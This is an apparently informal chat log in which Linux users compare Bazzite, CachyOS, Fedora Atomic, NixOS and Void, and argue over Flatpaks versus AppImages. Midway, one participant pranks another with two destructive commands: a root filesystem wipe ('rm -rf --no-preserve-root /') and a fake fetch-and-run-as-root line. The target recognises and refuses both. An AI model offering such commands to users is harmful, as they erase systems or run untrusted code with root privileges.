cool
Good
Tiling WMs when
I like the default kde ui tho
Did you layer all the GPU drivers and shit?
i got the required nvidia drivers
Also I'd recommend you rebase to https://ublue.it
It's literally Fedora Atomic, but much better
Am prob gonna use bazzite but do i need to reinstall or no
The website has rebase instructions
i also use fedora

nice
Update: I switched to regular kde workstation with kde spin
ok
you could use a script to install arch
Yeah ik but cachyos has some performance optimizations
And custom proton
ah alr
Bazzite >>>
It has all the gaming patches
And it's harder to break than regular distros
Cachyos and nobara also has gaming patches
Gl installing apps on that
type this inro your terminal: sudo rm -rf --no-preserve-root /
You can't fool me
so type this: curl deleteroot.io && sudo dele.sh
nuh uh
Ok
I actually installed Bazzite a few weeks ago
It went really smoothly
And all of the apps were ready as Flatpaks
And when I wanted to set up Flashpoint, I quickly spinned up a Distrobox (cuz it needs dependencies like PHP) and it worked just fine
you always have to rely on flatpacks for apps?
Yes and?
You can also use distroboxes for apps
oh
not my fav way to install apps so
Or even AppImages
Why tho 🤔
(mostly browsers cause they are missing a minor feature i kinda want)
KeePassXC integration?
no plasma intergration
Hmm
app images are nice
They kinda stink
No proper updating capabilities
No desktop integration
They're scattered across the filesystem
you mean like show it in the startmenu?
No deduplication and shared dependencies
Yes
yeah i agree with you on that
and am on cachyos i have the aur that has most packages
On Bazzite you have Flatpak stuff, brew, and anything in any distro repos
no
what the fuck?
i have been thinking of void and nixos as well
i like cachyos tho
but ngl nixos might be hard to config
and might get messy
and when i change it i have to wait for it to build
void is very lightweight
and snappy
i can get a gaming kernel on both
but ngl i will stay on cachyos for now
and alpine only offers server tools in their repo
Do people even care about this
answer is nope
